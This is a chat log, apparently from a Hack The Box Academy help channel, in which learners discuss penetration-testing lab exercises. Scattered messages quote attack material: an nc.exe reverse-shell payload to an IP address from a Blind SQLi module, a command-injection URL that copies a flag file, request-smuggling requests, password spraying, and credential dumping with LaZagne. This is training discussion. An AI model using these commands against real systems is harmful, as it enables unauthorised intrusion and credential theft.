dapper moth
#

Yeah… but have you read your output in Linux?

dapper moth
#

Read what it’s doing and check what command you are passing in the Windows host

naive marsh
#

If I put ' in Accept header response is 500 internal server error is it exploitable or not.

weak kindle
#

[FIXED]
Kerberos Attack - Silver Ticket on Linux
The target is taking more than 10 mins to spawn, can someone from HTB confirm if this an issue?

brave scroll
dawn bloom
#

Guys i have a question, when u are inyecting commands on a web app, the characters ||, ; , &, && etc are to concatenate ur command inyection or to bypass any filter?

brave scroll
dawn bloom
brave scroll
dawn bloom
#

I understand bypassing like for example ; is not allowed but when inyecting ${LS_COLORS:10:1} (Result in ;) you are allowed, so my question is, finding a character that u can use is the same as finding a way to inyect a character u are not suppose to use?

dapper moth
#

You can also use the browser if you want

quiet trout
#

(above the call), this is all quite new to me

#

nvm it looks like its preparing vars, args, etc to pass to the function...

#

Could use a rewording on the opening sentence (Lets deconstruct the code [and its relevant requisities] as it appears...)

unreal grail
#

have you found the solution? Encountering the same issue.

marsh echo
dapper moth
weak urchin
#

Hey all,

Working on the HTTP ATTACKS -> TE.CL Question.

I've pretty much done and I also looked at the right way of doing it, however I get this issue. Instead of the "Invalid HTTP request line" as expected.

Any hints?

my request:

POST / HTTP/1.1
Host: IP:PPORT
Content-Length: 3
Transfer-Encoding: asdchunked

5
HELLO
0



wide tangle
#

Hi

#

Im working on responder machine tier1 when i reach the responder it keeps on listening for events and nothing happens what should i do?

dim wolf
#

oh, you probably don't have access. verify your account by following the steps in #welcome to get access

weak urchin
wide tangle
#

Thank you

#

So how should i fix my responder?

dim wolf
wide tangle
#

Okay thank you

unreal grail
# dapper moth Try different tools

I tried with invoke-passwordsprayews, invoke-passwordsprayowa, ruler and the metasploit module owa... is there any other tool I should think of?

slow ruin
#

For Introduction to Windows Evasion - Static Analysis. It states after all checks pass a flag.txt should be created... however it has been a few minutes with no flag.txt. Is there a check I am potentially not seeing?

hybrid temple
#

Can someone help me with the Advanced XSS and CSRF exploitation module - skill assessment? I can become moderator, perform XXS and request admin page, but get redirected to login page. I really don't know how to proceed...

lavish ember
#

Guys the submit buttons is not working for me how can I fix this?

cloud urchin
lavish ember
#

I submitted the flag and it was right but it didn't complete the module

cloud urchin
cloud urchin
hybrid temple
cloud urchin
#

the adblocker comment was for someone whose submit button didn't work

#

for you, you need to find what else you can do with your new privs

lavish ember
cloud urchin
hybrid temple
hybrid temple
# cloud urchin it's enough.

sorry, I meant, yes, of course it must be enough and I could perform XXS through that, but the request to the admin page gives me as an answer a redirection to the login page...so it seems that something is wrong in the way I perform XXS, even if apparently works

topaz ginkgo
#

Hey, did you get it figured out? I'm on the last exercise but I don't know what to look at anymore.

hybrid temple
dapper moth
dapper moth
rustic sage
#

i hate myself i cant decode my own file.

hybrid temple
cloud urchin
#

nope

unreal grail
dapper moth
#

Try the tool that the module only mentions but doesn't show

hybrid temple
dapper moth
#

And you could try the default password in the module

cloud urchin
restive lintel
#

What could be the issue??

cloud urchin
restive lintel
tired flax
#

Hey there someone completed the SCCM module?

sick nebula
#

I am stuck in the first question of the skills assessments part of the Windows Event Logs and finding evil module. I see all ID 7 logs. I literally went one by one to see if one of them has an image path that is suspicious ALSO with the imageloaded’s path… Please I need some advice in this. THANKS

Question: By examining the logs located in the “C:\Logs\DLLHijack” directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe

upper ruin
#

Attacking common applications: Attacking thick client side applications.

Windows PowerShell terminated with the following error:
The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.

Is this supposed to happen? I have to run a few scripts using powershell, however I can not open it.

#

Immediately when I open PowerShell it closes down.

cloud urchin
upper ruin
#

I might have to restart.

#

Ty for the advice.

dapper moth
wanton jasper
#

I am missing something on Limited File Uploads exercise. I have been at it for days. Can I DM someone for help on this

cloud urchin
#

i believe last time you posted your code it wasn't the same as the section, have you tried using the code that was provided?

wanton jasper
#

sent

slow ruin
# cloud urchin your code still has to work

I believe I built my code wrong. Did a dotnet build which i believe I have to use msbuild however, on the dev box it does not look like it is recognized and i am unable to add it as an environmental variable on the dev box...

cloud urchin
wanton jasper
slow ruin
dapper moth
teal sparrow
#

How do i type in general?

dim wolf
teal sparrow
wanton jasper
#

for anyone wondering, something was off with either my vm or proxies. Ended up getting it in pwnbox. Gonna spin up a fresh VM its a bout time anyway

#

thinking I may have messed up when I started using apt full-upgrade

#

going back to regular old upgrade

quasi wave
#

hi I am doing the password attacks module's AD section. I am on question 3. So basically, I need to do the fasttrack but I don't have fasttrack saved in the wordlists on the pwnbox. Does it have to be installed? Here's my terminal output:

┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-o1qua9zq2k]─[/usr/share/wordlists/seclists/Passwords/Default-Credentials]
└──╼ [★]$ crackmapexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/fasttrack.txt
SMB         10.129.202.85   445    ILF-DC01         [*] Windows 10 / Server 2019 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
SMB         10.129.202.85   445    ILF-DC01         [-] ILF.local\jmarston:/usr/share/wordlists/fasttrack.txt STATUS_LOGON_FAILURE```
#

I checked there's no fasttrack in there

#

but the tutorial is saying to use fasttrack

old oasis
quasi wave
#

I found fasttrack.txt online

quasi wave
#

ok thanks

quasi wave
#

great ok so password cracked

#

will do last question in section later tonight

tired dagger
#

guys on question + 0 Which kernel version is installed on the system? (Format: 1.22.3) i try command
uname -r and it says 6.5.0-13parrot1-amd64
as it needs format i put 6.5.13 even tried 6.5.0-13 and all possible formats none works it says incorrect answer, any help? or is it just bug?

wanton jasper
#

What does it say if you use uname -a

deft grove
#

Hi everyone, I am new, I am taking my frist steps into completing the fundamental paths. Right now I am the OS modules, starting with Linux. Enjoying it a lot so far.

dim gale
finite abyss
#

Hi I am not much familiar with Windows case, in Blind SQLi Module, RCE section
https://academy.hackthebox.com/module/177/section/1765

The payload is:
<snip>
c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;

But in Note it is given
Note: If you prefer using powershell, you can of course have nc.exe run it instead of cmd.exe by using a command like cmd nc.exe -nv 192.168.43.164 9999 -e C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

Is it cmd nc.exe or just nc.exe?
Why in the first payload it is not mentioned, Is it optional?

low ore
#

hi team i need some help im banging my head against a wall here, a gentle nudge would be greatly appreciated. Im currently working through Password Attacks, Credntial Hunting in Linux on the question: Examine the target and find out the password of the user Will. Then, submit the password as the answer. I have managed to get the correct SSH password for the user kira and logged in to the target, ive been able to use SCP to complete the file transfer of Firefox Decrypt 0.7.0 to the target but i am unable to run the file as Python isnt installed on the machine and i cannot install it via apt without sudo, ive also located some SSH keys via the bash history but dont know where to write them to if thats part of the puzzle, any help would be amazing ive been on this for days now

safe star
ornate orbit
#

Hello everyone. I'm trying to figure out this module NMAP Scripting Engine. I've run scans on every port with every script, but the only flag I get is the one from the previous module. What am I missing?

foggy monolith
#

Stuck on Web Attacks > HTTP Verb Tampering > Bypassing Security Filters which instructs you to try different HTTP methods besides GET/POST. I went one further by actually creating a wordlist of all possible methods:

GET
HEAD
POST
PUT
DELETE
CONNECT
OPTIONS
TRACE
PATCH

When I attempt to fuzz for this, however, nothing happens:

ffuf -w http-verbs.txt:FUZZ -X FUZZ -u 'http://83.136.254.158:31243/index.php?filename=notes.txt%3b{cp,/flag.txt,./}%3b'
<SNIP>
 :: Method           : FUZZ
 :: URL              : http://83.136.254.158:31243/index.php?filename=notes.txt%3b{cp,/flag.txt,./}%3b
 :: Wordlist         : FUZZ: /home/htb-ac-1424625/Desktop/htb-docs/web-attacks/http-verbs.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

OPTIONS                 [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 143ms]
PUT                     [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 145ms]
GET                     [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 151ms]
HEAD                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 150ms]
PATCH                   [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 155ms]
TRACE                   [Status: 405, Size: 305, Words: 26, Lines: 10, Duration: 155ms]
DELETE                  [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 618ms]
POST                    [Status: 200, Size: 1133, Words: 137, Lines: 29, Duration: 624ms]

Should I be using Burp Intruder instead of ffuf here or something?

safe star
#

The size is different

foggy monolith
# safe star The size is different

Yes, but the only different sizes I'm seeing here are HEAD (blank) and TRACE (405 Method Not Allowed). All the others attempted are Malicious input denied. What other filters are there?

proper rampart
#

im stuck on the very first module for the HTTP /download.php. im just not understanding the question and im so new at all of this that i simply dont know what to do even after reading 4x over. tho ive completed the other pwnboxs

safe star
#

For the question

foggy monolith
#

And no they didn't because they're the wrong status code.

safe star
#

Oh yeah I remember now

#

Get and post have different request formats

foggy monolith
#

Got it with curl; thanks

low ore
rocky estuary
#

Skills Assessment - File Upload Attack

i'm stuck i'm trying to upload the webshell but i get this message "Only images are allowed" i'm using this name for the file "test.p---.j---" with content type: i-----/j--- and i'm adding the MIME-Type above the webshell payload any idea what i'm missing ?

safe star
#

Yes there is one type of file ur missing

rocky estuary
safe star
#

I couldn’t find out either but I could still get the flag

#

Might go check again

ornate orbit
#

Hello everyone. I'm trying to figure out this module NMAP Scripting Engine. I've run scans on every port with every script, but the only flag I get is the one from the previous module. What am I missing?

rustic sage
#

Assalamu' Alaykum 🤍

fading birch
#

Yesh

viral slate
#

[MODULE]: Advanced XSS and CSRF exploitation
[SECTION]: skills assessment

Hello everyone!
Currently working on this module.
Was able to privesc to moderator, found a way to XSS, but getting error message on the last step.

Can I have a nudge?

spark spruce
#

module = Web cache poisoning
section = password reset poisoning
https://academy.hackthebox.com/module/189/section/2014 the interactsh.local vhost seems to not work, i tried a few reset but still nothing. i already change my host file to resolve it, i tried interactsh.local:thePort but nothing work, i waited 10 minutes for 2 instances.

any one please help here

analog dock
urban elk
#

hi all, feeling a bit stupid in the hard lab of the Footprinting module. Not sure how to say the least possible but it seems that my two assumptions are not holding (1. I need credentials to be able to do anything, and 2. I guess there's creds re-use from the medium lab), and I'm stuck at the moment. The slightest nudge would be appreciated

old oasis
spark spruce
urban elk
midnight galleon
#

what is a shorter rockyou?

autumn pilot
#

You can find various shorten rockyou dictionary lists in seclists

weak urchin
visual umbra
steady sparrow
#

Hello guys, I am new here glad to join..

agile aurora
#

is it a known problem with the chemistry machine where you cannot access the webpage?

fathom pendant
woeful lily
#

Hello! Anybody have any tips for solving the DNS Zone Transfers questions?

jolly yacht
#

Intro Assembly Language > Registers, Address and Data types. As you can see from the image, that the author mentioned that all the addressing mode are happening in the fetching stage by mentioning "There are several types of address fetching (i.e., addressing modes) in the x86 architecture:" and the preceding sentence. But actually the addressing modes was happening in the "execute" stage right because in the fetch stage it is used to only fetch the next instruction address from the rip(for x86_64 architecture) and then fetch the instruction from the memory by the instruction memory address right? But after getting the instruction, it will then decode (at 'decode' stage) the instruction from the machine code to assembly code to understand the code. Finally in the 'execute' stage only it is used to retrieve the operands and perform the operation right? As specified in the Module. So the addressing mode is actually happening in the execute stage rather than fetching stage as mentioned in that above section?

eager ledge
#

Hi,

Module: Attacking Common Applications
Section: Exploiting Web Vulnerabilities in Thick-Client Applications
Section Link: https://academy.hackthebox.com/module/113/section/2164

I am working from the pwnbox. So far, I have managed to install Java version 8 on the pwnbox. I have also downloaded the fatty-client.jar file, extracted it, modified it and created a new jar file. I am using the command java -jar fatty-client-new.jar to start the application. But when I try to login using the provided credentials, I get Connection Error. For some reason, Wireshark is not starting on the pwnbox. Can anyone nudge me on what I am doing wrong?

flat sleet
#

can someone help me understanding OSI

frosty jetty
#

guys on this "Credential Hunting in Windows" section

What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)
how to run LaZagne.exe in windows?

#

LaZagne comes in pyton and it's written : "C:\Users\bob\Desktop> start lazagne.exe all"

wicked apex
#

Module: Command Injection
Section: Skill assessment
Can someone give me a nudge of what should I do?
I tried both copy, view (via LFI) and move.
Moving the flag (which everyone said no need to) will response with permission denied
Copying would have it flag as Malicious
And I see no hope for reading

#

I was thinking of encoding, but I knew if I did so that would makes no difference as I prob inputted blacklisted char/cmd in the payload

#

I think I triggered something different this time
lets hope I can get something of it

rigid ivy
#

Just a little lost

pseudo kiln
#

any idea how we can do this from winrm ? when RDP is not available

fading seal
#

Hi.
This is my first message here.

When studying the modules, I try to replicate the steps both in the pwnbox provided by the academy and in my local VMs.
Recently, while trying to use odat in a section with OracleTNS, I encountered issues on one of my virtual machines due to the Python version.
In my current job as a developer, we often use "asdf" for different versions of Java, Node, and Python.
I just wanted to mention that in the end, this was the approach I used to be able to run odat on my VM. It might be useful for someone else as well.

unborn oriole
hardy elk
#

Is anyone experiencing issues trying to connect to the HTB VPN/Machine on macOS?

acoustic owl
pseudo kiln
# acoustic owl In which module and section do you need this? Then I can look in my notes to see...

Windows Privilege Escalation > Windows Group Privileges > Windows Built-in Groups
Backup operator section
https://academy.hackthebox.com/module/67/section/601

It's more of a general question really, not related to the module, like what if you have winrm only access with no RDP ? In the module you do have RDP access. (diskshadow.exe seems to only work with RDP access, trying to spawn it inside evil-winrm does not work)

serene kite
#

And, also add the host to etc/hosts file

serene kite
#

diskshadow.exe /s <path to file containing the commands>

pseudo kiln
eager ledge
eager ledge
nova ginkgo
#

Hello everyone can acnyone help me pls : Perform vhost discovery. What additional vhost exists? (one word)

Attacking Enterprise Networks | External Information Gathering

I take content length ||15157|| then i use that with ||fuff -fs 15157|| but there is a lot off subdomains

pls give me some hint

dapper moth
#

But if you don’t have RDP and you think that PowerShell is killing anything you are passing, you can always gain a CMD session with nc.exe

#

But probably it’s encoding

tired dagger
tired dagger
pseudo kiln
# dapper moth But probably it’s encoding

do you know how to solve the encoding problem ? I simply create the file with the commands on my vm, transfer it over with smb then run it. Also I don't think nc.exe session would work either because it's not fully interactive, but I will give it a shot who knows

dapper moth
#

But use unix2dos on your script

#

Before transferring

#

It should work

pseudo kiln
#

many thanks, I will try it out

wanton jasper
limpid hemlock
#

Hey anyone knws how to fetch a flag from an IMAP server

tired dagger
next stone
#

I need help with Intro to Assembly Language skills assessment task 1

#

I XORed all values of rax with the key in the rbx but the result doesn't seem like valid shellcode and can't execuate it

wanton jasper
teal oasis
#

In Introduction to Binary Fuzzing ->Glee with Klee->Question #2: I only find one vulnerability that is "Memory Error: Null page access". I am clearing missing something if anyone one has a hint of what I am doing wrong 🙂

rustic sage
#

Hi there! I am quite new to cyber security/ Linux and I have a question about one of the beginner modules. Would someone be able to help?

rustic sage
#

I am working through the Linux Fundamentals module in the System Information section. I am trying to use ssh to log into the htb-student account. I tried using ipconfig to find the computer's IP address but it didn't work and I tried using the IP address in the command prompt but that didn't work either. What am I doing wrong?

teal oasis
rustic sage
#

No I spawned an instance of the pwnbox

#

I enter the password but it always says 'Password denied'

teal oasis
rustic sage
#

Oh.. I just realised I was supposed to actually create a target

#

My bad

teal oasis
tired dagger
#

when im running htb vm and im in ssh, running some command lines after some time it just freeezes like i wrote "find / -type f -name *.conf -user root -size +20k -newermt " and after this it just is frozen, nothing works no enter, backspace, nothing. vm works fine tho just that current cmd im working in is stuck, is it bug or what is wrong with it ?

rustic sage
#

It is slow for me too sometimes

tired dagger
#

no not just slow it just stuck frozen until u execute another cmd and do the same task again just to get it frozen again after couple of minutes, vm still works fine tho it just cmd that has this bug

rustic sage
#

Yeah it freezes for me too but it usually goes back to normal after a few seconds

#

idk why it does that

karmic girder
#

hi guys

#

iim stuck with Skill Assessment - Windows Event Logs & Finding Evil

#

By examining the logs located in the "C:\Logs\Dump" directory, determine if an ill-intended login took place after the LSASS dump. Answer format: Yes or No

#

Can anyone tell me how to do it?

gusty ravine
#

hi guys i wanted to know that from where should i start ethical hacking like mr robot???

#

Well i want to become a pentester like ryan montgomery but i get confused from where to learn???? Please help me

dapper moth
#

But you can look for logon events

rustic sage
#

What should i do if my friend got hacked

storm elk
rustic sage
#

Tried it. “Discord cannot do anything against compromised/hacked accounts” it said

storm elk
#

Create a new account and move on is the only option I guess

#

We can’t help you with this

rustic sage
#

K i was just wondering

heavy edge
#

are the vpn servers just trashing right now

quasi wave
#

hi I am doing password attacks module's AD passwork attack section and crackmapexec is not recognized as a command here:

┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]
└──╼ [★]$ crackmapexec
bash: cme: command not found
┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]
└──╼ [★]$ sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.
┌─[us-academy-1]─[10.10.15.10]─[htb-ac-605555@htb-ludqisjdzv]─[~]```
#

this is on pwnbox

autumn pilot
#

netexec

quasi wave
#

ok

onyx rapids
#

I just completed the Senior Web Penetration Tester role and I want to see how many others have finished this role. How can I do that?

tranquil axle
tranquil axle
#

click on share, then "Get a shareable link" then click that link

woven bronze
#

hello guys , i'm trying to solve the EvilCUPS box i've followed the ipsec video and i've downloaded the exploit from its github repo then when i want to execute the test print job of the my malicious machine to get a reverse shell i got this error on the cups dashboard "stopped
"Filter failed"" and when i go and see the python code i got this error too "Exception occurred during processing of request from ('10.10.11.40', 48740)
Traceback (most recent call last):
File "/usr/lib/python3.10/socketserver.py", line 683, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.10/socketserver.py", line 747, in init
self.handle()
File "/usr/lib/python3.10/http/server.py", line 425, in handle
self.handle_one_request()
File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request
method()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 101, in do_POST
self.handle_ipp()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 140, in handle_ipp
ipp_response = self.server.behaviour.handle_ipp(
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 71, in handle_ipp
return command_function(ipp_request, postscript_file)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 163, in operation_print_job_response
self.handle_postscript(req, psfile)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 410, in handle_postscript
raise NotImplementedError
NotImplementedError

target connected, sending payload ..." so please anyone can help me

analog dock
#

Can someone explain the answer format in ‘error based sql injections’ from advanced sql injections module? I have all the info I need but it doesn’t take the answer

bright coral
analog dock
woven bronze
bright coral
foggy monolith
#

Why am I getting MQo= instead of MQ== when I try to Base64-encode the number 1 in a terminal despite MQ== showing up when I use btoa(1) in the JavaScript console of a web browser set to the target in the "Bypassing Encoded References" section of the Web Attacks module?

foggy monolith
safe star
#

probably cause of the new line, try echo -n

fringe gorge
#

Hii I am working on chemistry machine can someone help me?

viral snow
#

Any and all help would be appreciated.

I'm in Attacking Common Applications - Jenkins Discovery & Enumeration.

I'm trying to navigate to the web page http://jenkins.inlanefreight.local:8080, to no avail.

I ran an nmap scan, and it's telling me port 8080 is filtered.

Anyway I can get around this?

Edit: Oh, and I already added Jenkins.inlanefreight.local to the list of vhosts in /etc/hosts

final shale
#

I believe you are asking for the Attacking Common Applications

viral snow
final shale
#

I would be glad to help, but i am not quite there yet. I doing the courses but not there yet

vestal gate
#

Hey,how do you recomend me to start taking notes?

thorny sluice
#

I'm on the File Upload Attacks module and Blacklist filter section and keep getting no web shells. I bypass the blacklist but my one liner for the web shell isn't executing I can just read its source code.

foggy monolith
#

Having the same problem a month and a half later myself. Rickroll but no flag and changing the email doesn't replace the rickroll with a flag like it's supposed to.

#

Just gets blanked when the request is sent with the about parameter blank

foggy monolith
quasi wave
#

I'm doing Windows Credential Hunting section of Password Attacks section and I am having trouble moving LaZagne to Windows. I went to previous section on SAM security to relearn how to move file between Windows and Linux and its not working.

C:\Windows\system32>move \\10.10.15.10\LaZagne C:\
The specified path is invalid.

C:\Windows\system32>move \\10.10.15.10\Lazagne C:\
The specified path is invalid.

C:\Windows\system32>move \\10.10.15.10\LaZagne\ C:\
The system cannot find the path specified.

C:\Windows\system32>move \\10.10.15.10\LaZagne\ C:
The system cannot find the path specified.

C:\Windows\system32>move \\10.10.15.10\LaZagne\Windows\laZagne.py C:
The system cannot find the path specified.

C:\Windows\system32>```
#

What am I doing wrong here and how do I get the file onto Windows?

#

I need to do this as a prerequisite to solving question 1

foggy monolith
#

Looks like you're forgetting the .exe file extension

quasi wave
#

ok hold on

#

but the file I'm moving is a Python file

#

do I need to turn it into an exe?

#

and why can't I move an entire folder?

foggy monolith
#

Nope, there should be multiple formats. The Windows executable is going to be much easier to use on a Windows target because you won't have to install Python first.

#

Did you make sure to attach a share to the target using the /drive parameter to xfreerdp?

quasi wave
#

ok cool

#

no

#

I didn't need to do that last time

#

for SAM security section at least

#

so why would I need to do it this section?

foggy monolith
#

Alright, hold on…

safe star
viral snow
safe star
quasi wave
safe star
#

i just copy and paste the files if its through rdp

quasi wave
#

ok

safe star
#

if smb fails just use python http server too

foggy monolith
quasi wave
#

and the Windows box has no Internet

#

I'm guessing I need to download it on the attack box and transfer over? because if that's the case you just posted that at the right time @foggy monolith

safe star
foggy monolith
#

That's why you use laZagne.exe instead of laZagne.py on Windows targets, and yes, you need to download it to the attack machine first. @quasi wave

safe star
#

cant remember gotta check that again

foggy monolith
#

Web Attacks § Chaining IDOR vulnerabilities
Fuzzing the parameter returns only 10 valid users and only 1 of them is an admin — and this admin's about field is a rickroll, not a flag.

safe star
#

did you get "1" as a response after changing it?

foggy monolith
#

Is that because '1' is the wrong response?

safe star
#

1 is right

#

so its changed in the profile dir?

#

yes

foggy monolith
#

Oh, wow. Should have seen this coming.

safe star
#

password attacks isnt about web attacks

#

they split the path into 2 sections, web and network

#

@foggy monolith you get it?

foggy monolith
#

Curious though why the role path has all the web stuff at the end and not the beginning. Most real-world initial footholds start with web and end with domain compromise, not the other way around, so the layout does seem a bit backwards — if it's because all the stuff at the end of the role path is at the beginning of the CPTS exam, however, that might explain it.

viral snow
#

Attacking Common Applications - Jenkins Discovery & Enumeration

I've respawned the target machine multiple times, and even logged out and logged back in.

Every time I spawn a new target machine, I keep getting the same "filtered" message when I run an nmap scan.

Even ping sends me a "Destination Host Unreachable" message.

I update the IP in /etc/hosts every time I respawn a new target machine.

I've done what I can, and for some reason I just can't get http://jenkins.inlanefreight.local:8000 to connect.

Anyone else run through this problem?

safe star
#

are you connected to the vpn

viral snow
viral snow
foggy monolith
safe star
viral snow
viral snow
safe star
#

What about pwnbox

#

Pwnbox should have no problems

static roost
#

#Module: Windows Lateral Movement
#Section: Windows Remote Management (WinRM)

Second question in spoiler image.

I can not RDP to SRV01 with helen. I'm using Remmina (haven't had any issues until now.) Netexec shows that helen can RDP to SRV01. SharpRDP also doesn't work with Helen. Nothing seems to work except using ||RunAsCs|| but that's not in the module so far. I haven't tried accessing via internal interface w/ chisel or ligolo. I imagine it would work but doesn't seem to align with how the section is presented.

viral snow
cloud urchin
viral snow
idle marsh
viral slate
#

[MODULE]: Advanced XSS and CSRF exploitation
[SECTION]: skills assessment

Hello everyone!
Currently working on this module.
Was able to privesc to moderator, found a way to XSS, but getting error message on the last step.

Can I have a nudge?

cloud urchin
viral snow
#

Finally!!! 😩😩😩

Big thank you to @idle marsh for helping me out with this one!

idle marsh
foggy monolith
cloud urchin
#

yeah but you mentioned real engagement, real engagements generally just give you an AD account to use

next bronze
#

IIS is still very common, but most of them aren't domain joined

river marsh
#

so as i go through the modules a lot of external resourcces are brought up such as secLists, Payload of all things, internal all the things. 2 parter, first do people actually use these when performing cybersecurity? and secondly, how do people organize and keep track of them all xd

dim wolf
#

yes, they are valid resources. how to keep track of them all is up to you

#

bookmark them, have them in your notes/cheat sheets, etc

viral slate
cloud urchin
#

ok

karmic dirge
#

wow nosql II is evil

eager ledge
#

I added the entry on /etc/hosts file. Before, when I clicked on the Login button, I used to get Connection Error immediately. But now, the application freezes for some time(a minute or so) and then I still get Connection Error. When I check whether the target machine is listening on 1337 port, I get negative results everywhere:

server.fatty.htb [10.129.228.115] 1337 (?) : Connection timed out
nmap -v -n -Pn -p 1337 -A 10.129.228.115
PORT     STATE    SERVICE VERSION                                                                                                                                                             
1337/tcp filtered waste 
#

What am I doing wrong? I am not even able to login to the application.

#

Nevermind I didn't notice that I could RDP into the target server.

floral sandal
#

How can I remove the payment method in my account so that I can buy cubes using another method?

cloud urchin
#

under billing there's an update payment method button

stark lark
autumn pilot
#

this is an example

#

There are other variants of shells that you can apply (use)

stark lark
autumn pilot
#

You apply the knowledge you've gained in the section in the exercise, the exercise won't be 1:1 to the examples

gusty badger
#

guys anyone know how we can buy a CBBH Voucher with special package

gusty badger
misty saddle
#

You get a link after you've passed the exam.

gusty badger
#

ok thank 🙂

#

thats really perfect

storm elk
#

In your certification overview on Academy, there will also be a button to link you to the cert

plucky beacon
#

okay, can someone tell me why i am stupid for getting this wrong? What am I overlooking?

idle marsh
plucky beacon
#

module 18 section 70

#

linux fundamentals -> system information

autumn pilot
#

htb-ac-XXX is not htb-student

plucky beacon
#

omg

#

omfg 🤣 okay this is the kind of shit i need to get used to ig

#

thanks pal

idle marsh
#

ah ye u looking at the wrong thing haha

plucky beacon
#

nah i just assumed "htb-student" was a placeholder for the logged in student

idle marsh
#

ic. hahaha

plucky beacon
#

this is like finding out the default su password for parrot os is parrot

#

its so obvious yet so illusive

viral slate
#

[MODULE]: Advanced XSS and CSRF exploitation
[SECTION]: skills assessment

Hello everyone!
Currently working on this module.
Was able to privesc to moderator, found a way to XSS, but getting error message on the last step.

Can I get help?

rustic sage
#

Hi Guys, I'm presently enrolled in the Web Fuzzing module and having trouble in installing the ffuf and gobuster in the HTB Academy parrot terminal- Screenshot has been attached, please help me out in continuing the module without any hiccups or avoiding any step.

#

How do i add screenshot in this message ?

next bronze
midnight galleon
#

how much rev eng do i need to know as a pentester?

#

cuz all i know for now is strings.exekek

hexed lintel
#

how to fix this unable to connect to ldap issue

#

note: I am connected to target using ligolo-ng

strange pivot
#

is it a user connected to the domain, if not it needs to be psexec'd to get sys privileges

hexed lintel
strange pivot
strange pivot
hexed lintel
# hexed lintel

here user dollar is conneced to the domain and is administrator.

strange pivot
#

I would say, try get system level access and see if that makes a difference

#

the machine can't connect through ldap for some reason

hexed lintel
strange pivot
#

try running python sharphound from your attack machine instead, make sure you add the domain to your etc/resolv

next bronze
hexed lintel
next bronze
#

well there you go, if it can't even find the dc how does it pull data

#

and by pivot I'm assuming you're talking about the winrm machine

hexed lintel
#

what should i do next

autumn pilot
#

from which module is that

rustic sage
#

This is the screenshot which i'm getting error or timeout in web fuzzing module

autumn pilot
#

Try with:

sudo apt install ffuf
rustic sage
dapper moth
strange pivot
autumn pilot
strange pivot
normal sand
#

What's ya'lls go-to command for listing file/folder permissions on the Windows command line, basically the Windows equivalent of ls -la in a Linux envrionment?

dapper moth
strange pivot
#

ohh wow 😛

next bronze
#

or icacls

normal sand
# next bronze it's not as simple in windows because there are buch of special permissions but ...

Ah, okay. That's what I currently use. I was just doing the Citrix Breakout section in the Windows Privilege Escalation module. I'm assuming these techniques work on any kind of restricted environment? I asked about viewing file permissions because the section mentions being able to bypass GPO restrictions by utilizing Explorer++, but this still means there may be other UAC restrictions/local file restrictions and such, right?

next bronze
#

yeah you'll have to work with what you've got

normal sand
#

Thanks

next bronze
fathom pendant
storm elk
#

alias fuff=ffuf

#

but yes, Marcie is right. the command is ffuf and not fuff

urban elk
#

I have foof set up

rustic sage
fathom pendant
urban elk
#

☺️ oh my

quiet trout
#

personally, i call it ff

mellow saffron
quiet trout
mellow saffron
#

Brute force id paramter with burp

quiet trout
#

ok thats gonna take light years

mellow saffron
#

I used burp pro

quiet trout
#

thats the way to go about it in realworld, with your company provided copy of burp pro with unlimited requests but we dont have that

#

oh, i see, ok and you still didnt come up with a valid userid?

mellow saffron
#

Yeaaaa

#

I capped at 300

quiet trout
#

maybe wanna do 1 -1000 like it mentions in the guide from the section or two before

mellow saffron
#

Truee let me try quick

quiet trout
#

you sure you're using pro right? thats gonna take ages

mellow saffron
#

Yes ofc

quiet trout
#

in comm ed

#

ok just making sure, no need to phib we have FOOF that can run our reqs for us

#

prob best to get familiar with f00fie too, just as a ancilliary component of this lab

mellow saffron
#

Got it

#

It was 3xx

quiet trout
#

(most people dont have burp pro if they're not working for a company that provides it)

#

(or they're using a cracked version... which you'd NEVER do right?)

mellow saffron
#

Yea Iknow I could use ffuf to as well but for cbbh exam I wanted to practice brup pro

mellow saffron
quiet trout
#

cool cool, i completed the path a month ago or so, never took the exam. let us know how it goes when you take it curious what exams are like on htb

quiet trout
mellow saffron
#

Ty for help

#

is there any karma system I def +rep you xD

quiet trout
mellow saffron
#

oh ok

quiet trout
#

@dim wolf you around? any chacne you got back with your notes and can help me understand why procmon was outputting blank? #modules message

midnight galleon
#

Attacking common applications
Coldfusion enum
I nmaped port 5500 and submitted the protocol under the service column but it seems wrong

quiet trout
#

hey @fathom pendant you mentioend that some target boxes are public facing? does that include 10.x.x.x boxes? the demo Im working on suggests i use my own VM for INetSim not the pwnbox.

quiet trout
#

only boxes with a port right?

fathom pendant
#

Correct

#

Specifically ones that use a public ip:port